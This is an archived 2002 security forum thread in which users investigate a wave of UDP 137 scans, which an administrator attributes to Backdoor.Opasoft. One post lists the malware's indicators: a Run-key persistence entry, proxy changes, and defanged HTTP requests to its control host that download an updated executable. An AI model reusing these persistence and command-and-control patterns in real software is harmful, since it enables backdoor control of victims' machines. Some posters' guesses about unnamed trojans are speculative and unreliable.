new trojan known for UDP 137: Backdoor Opasoft

Discussion in 'malware problems & news' started by Jooske, Sep 28, 2002.

Thread Status:
Not open for further replies.
  1. Jooske

    Jooske Registered Member

    Joined:
    Feb 12, 2002
    Posts:
    9,713
    Location:
    Netherlands, EU near the sea
    Hi dear forum fellows, just wondering, as i get a remarkable high amount of UDP 137 knocks 99% of Korean origin (most of time originating from their port 1025) since yesterday but today it's really many, i wonder if something known is going on? ShieldsUp told me i'm stealth but ....

    With this i wonder if more people name their computer
    {not available} for their protection against resolving :)

    subject line changed - Forum Admin
     
  2. Jooske

    Jooske Registered Member

    Joined:
    Feb 12, 2002
    Posts:
    9,713
    Location:
    Netherlands, EU near the sea
    Re:Any new trojan known for UDP 137?

    See this dynamic report page
    http://isc.incidents.org/port_details.html?port=137
     
  3. javacool

    javacool BrightFort Moderator

    Joined:
    Feb 10, 2002
    Posts:
    3,995
    Re:Any new trojan known for UDP 137?

    It is possible this is a trojan - or some sort of coordinated attack by some hacking group against various IP ranges (since, as you said, it seems to be coming mostly from Korea...).

    Or it could be a hacker trying out "their" compromised machines to try to find more machines to compromise...who knows. :rolleyes:

    If i find any more information on new trojans, viruses, etc that use this port, you can be sure I will post it.

    -Javacool
     
  4. Jooske

    Jooske Registered Member

    Joined:
    Feb 12, 2002
    Posts:
    9,713
    Location:
    Netherlands, EU near the sea
    Re:Any new trojan known for UDP 137?

    If you look at the page now you see it has passed 8% of the reports, with over 108,000 records and this is 2% more already then the big attack on 14 September.
    Found older reports also exactly servers probed on UDP 137 to take over with 1025-1026; shared files and trying to install backdoor and destroying stuff.
    I found out the moment i open TDS port listen it stops immediately till i close that and it starts again in a few moments.
    During the day the attacks have moved round the globe with the sun over the whole time zones and now it's back in Korea for me.
    Hmm that port listen doesn't stop the port 80 knocks now.

    As UDP has not the return signal but TCP has, that's the reason why i think it might not be a bad idea to rename your own computer to {not available} in stead of whatever it is. (see the resolve info in VisualZone and you see what i mean)

    Compromising or compromised already, both is possible, maybe trying to install zombies for a big DoS, maybe the Kazaa taking over or from another p2p service..... all is possible and most people don't wake up, thinking 137 is innocent but i'm sure it's not in this case.

    Looking forward to your finds, as google doesn't bring me any recent news nowhere.
     
  5. FanJ

    FanJ Guest

    Re:Any new trojan known for UDP 137?

    Hi Jooske,

    I really get bombarded with those UDP NetBios Name scans.

    It's no fun :mad: .........
     
  6. Jooske

    Jooske Registered Member

    Joined:
    Feb 12, 2002
    Posts:
    9,713
    Location:
    Netherlands, EU near the sea
    Re:Any new trojan known for UDP 137?

    Finally somebody is waking up, why you think i started warning many hours ago? Don't know what to do about it but being happy the firewall still seems to stop them.
    Coming unorganised from everywhere now, think they're trying to DosS the whole internet.
    Still don't see anything useful nowhere on info what this is about. New Kazaa? It's not peek-a-booty as that was on 443 if i remember well, so what can it be?
     
  7. controler

    controler Guest

    Re:Any new trojan known for UDP 137?

    here is another site for posted attacks

    http://www.dshield.org/
     
  8. Jooske

    Jooske Registered Member

    Joined:
    Feb 12, 2002
    Posts:
    9,713
    Location:
    Netherlands, EU near the sea
    Re:Any new trojan known for UDP 137?

    From dshield to the reports pages you come on those Storm pages i posted above.

    Would like to know if other people are still getting all those knocks? And if it helped for more people with TDS to open the Port Listen on 137? Tried various times and with that on i only got the normal few port 80 probes, but no 137 anymore.
    Do other people have other ways which are helpful?
    The reports displays are not all updated in the plot since 28 september 22:xx GMT where almost 8% of the attacks were port 137 with over 108,000 records. So it must have grown since.

    Did anybody find more info on what is going on already? whatever it was, it seems very successful for the attackers.
     
  9. Pieter_Arntz

    Pieter_Arntz Spyware Veteran

    Joined:
    Apr 27, 2002
    Posts:
    13,312
    Location:
    Netherlands
    Re:Any new trojan known for UDP 137?

    Jooske,

    I´m not very knowledgeable in this field, but could it be they have switched to untraceable IP´s ?
    I´ve been keeping an eye on my SPF logs since you started this thread and now I´ve got my first attempts all coming from what looks like home network ranges.

    Regards,

    Pieter
     
  10. controler

    controler Guest

    Re:Any new trojan known for UDP 137?

    Hi all

    Since I am from the old school and still believe things should be kept simple.

    Here is a nicely written article written by a member of the GRC forum

    Deciphering the NETSTAT -AN DOS command


    http://www.geocities.com/merijn_bellekom/new/netstatan.html
     
  11. Primrose

    Primrose Registered Member

    Joined:
    Sep 21, 2002
    Posts:
    2,743
  12. Jooske

    Jooske Registered Member

    Joined:
    Feb 12, 2002
    Posts:
    9,713
    Location:
    Netherlands, EU near the sea
    Re:Any new trojan known for UDP 137?

    Not sure, i have them from home users, universities, internet cafes, companies, networks (seeing their computers names/identifications) from all over the planet.
    Not a single one from our ISP this time, so they might have put good filters up.
    Maybe they track especially ZA/ZAPro users :)

    At GRC.com the security forum is some discussion about it, but also there no more conclusions then we have here.
    On the dshield reports page it is now 15% of the records today and in the yellow alarm phase, last night has grown over 200,000 records to over 10% of yesterdays submissions.

    Still thinking of something like Kazaa but our ISPs security department is not sure yet.
    They were really happy with my find to open in TDS the Port Listen. It's complete illogical in my opinion, as that listens to TCP ports packets and this is an UDP port, but it stops the portscans immediately.
    ShieldsUp does not show that port all open with this now, so no worry!
    Good time to use your panic button page for something informative today :p
    http://home01.wxs.nl/~kleyn080/schudden.html
    Is it still up?
     
  13. Primrose

    Primrose Registered Member

    Joined:
    Sep 21, 2002
    Posts:
    2,743
  14. Pieter_Arntz

    Pieter_Arntz Spyware Veteran

    Joined:
    Apr 27, 2002
    Posts:
    13,312
    Location:
    Netherlands
    Re:Any new trojan known for UDP 137?

    Yeah, it´s still up, but I haven´t found the time to make improvements. ;)

    I´ve got a few logs coming from port 1026 as well.

    Regards,

    Pieter
     
  15. Primrose

    Primrose Registered Member

    Joined:
    Sep 21, 2002
    Posts:
    2,743
    Re:Any new trojan known for UDP 137?

    There are currently 4 NEW different Trojans out that take over a machine Via Kazaa infect that machine..use it as a drone then go out on various ports ie 1025 etc or go out and infect other machines so they can run a co ordinated attack.
     
  16. Jooske

    Jooske Registered Member

    Joined:
    Feb 12, 2002
    Posts:
    9,713
    Location:
    Netherlands, EU near the sea
    Re:Any new trojan known for UDP 137?

    Can you give the names of those trojans please?
    It's exactly the behavior we see i guess?
    I've seen in the dshield reports the most are share/ p2p ports, Kazaa, Gnutella, same like msinit/bymer; whoever did it, seems rather successful.
    Are there more ways of closing the attacks then what i do withj the port listen up? not any 137 knock!
     
  17. FanJ

    FanJ Guest

    Re:Any new trojan known for UDP 137?

    To give an idea for about one hour:


    Note:
    I have put xxxx at the last four digits of the IP-numbers.
     

    Attached Files:

  18. Pieter_Arntz

    Pieter_Arntz Spyware Veteran

    Joined:
    Apr 27, 2002
    Posts:
    13,312
    Location:
    Netherlands
    Re:Any new trojan known for UDP 137?

    Not that bad, but still.. :mad:
     

    Attached Files:

  19. Jooske

    Jooske Registered Member

    Joined:
    Feb 12, 2002
    Posts:
    9,713
    Location:
    Netherlands, EU near the sea
    Re:Any new trojan known for UDP 137?

    And can you now try in TDS > Networks > TCP Port listen, fill in #137 > Listen and look once in a while at the results?
    Remembering TCP has it's UDP twin most of time so this is part of logic of the result.
    As i really like to read if that works for you too to stop the scans on 137.
     
  20. LowWaterMark

    LowWaterMark Administrator

    Joined:
    Aug 10, 2002
    Posts:
    17,838
    Location:
    New England
    Re:Any new trojan known for UDP 137?

    It sounds like that TDS option is starting up a listener and opening up the port you specify. If that's what TDS is doing then it's not so much that you've stopped the incoming probes, it's more that you have started absorbing them. Your firewall is not alerting because it sees a program that has permission to listen on that port, so the firewall let's those packets into your system where TDS is reading them.

    It is certainly one way to stop the firewall alerts.

    Question: Do you know what TDS does with the incoming data? Does it write it to some kind of listening log file, where you can then analyze the packets? That would be real useful.

    Here is a simple port listening tool that could be used in a similar fashion I'd imagine:
    http://www.xploiter.com/tambu/tambudummy.shtml
     
  21. Jooske

    Jooske Registered Member

    Joined:
    Feb 12, 2002
    Posts:
    9,713
    Location:
    Netherlands, EU near the sea
    Re:Any new trojan known for UDP 137?

    We can allow the function to act as a server, so it would be able to communicate; in the other way it is just stopped; other people got nice log files of the 50 bytes probe packets, which seemed the normal net bios requests.
    With some other tool i look at the data amount but nothing is received nor sent on those listening ports with the counter on 0. The absorbing was my first idea too, so lets wait and see what comes next!
     
  22. Paul Wilders

    Paul Wilders Administrator

    Joined:
    Jul 1, 2001
    Posts:
    12,472
    Location:
    The Netherlands
    Re:Any new trojan known for UDP 137?

    Well, the answer is: backdoor.Opasoft - detected by KAV since this very day. Here are some specs:

    RegisterServiceProcess SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    Software\Microsoft\Windows\CurrentVersion\Internet Settings ScrSvr
    ScrSvrOld ProxyEnable ProxyServer \ScrSvr.exe ScrSin.dat ScrSout.dat
    scrupd.exe wwx.opasoft.com GET
    http://wwx.opasoft.com/work/scheduler.php?ver=01&task=newzad&first=0
    HTTP/1.1
    Host: wwx.opasoft.com

    GET http://wwx.opasoft.com/work/lastver HTTP/1.1
    Host: wwx.opasoft.com

    GET http://wwx.opasoft.com/work/scrsvr.exe HTTP/1.1
    Host: wwx.opasoft.com

    POST http://wwx.opasoft.com/work/scheduler.php?ver=01&plain=0123456789ABCDEF&cipher1=0123456789ABCDEF&cmpmask=FFFFFFFFFFFFFFFF&key=123456&res=0
    HTTP/1.1
    Host: wwx.opasoft.com

    PLAIN CIPHER1 KEY:
    WINDOWS\scrsvr.exe WINDOWS\win.ini c:\tmp.ini
    c:\windows\scrsvr.exe , windows run

    URLs made useles: "wwx" -Forum Admin

    Moving this thread to the appropriate forum

    regards.

    paul
     
  23. jvmorris

    jvmorris Registered Member

    Joined:
    Feb 9, 2002
    Posts:
    618
    Paul,

    Yep, just came over to check out Jooske's thread. There are now two threads running on this at DSLR Security Forum. Look for postings by psloss, Name Game, and NetWatchMan.
     
  24. Jooske

    Jooske Registered Member

    Joined:
    Feb 12, 2002
    Posts:
    9,713
    Location:
    Netherlands, EU near the sea
    wwx.opasoft.com resolves so nicely to 127.0.0.1 !
    Would like more info, to know possible threats and damage. Imagine if my opening the TCP Port Listen all time (which really stopped the knocking) caused more that i would be aware of this moment? Dont think so, but never know :) till we're all sure.
    But as there are several trojans with the same kind of behavior, could there be more..? thinking of the people mentioning combinations with 443 and some on 445.
     
  25. FanJ

    FanJ Guest

Loading...
Thread Status:
Not open for further replies.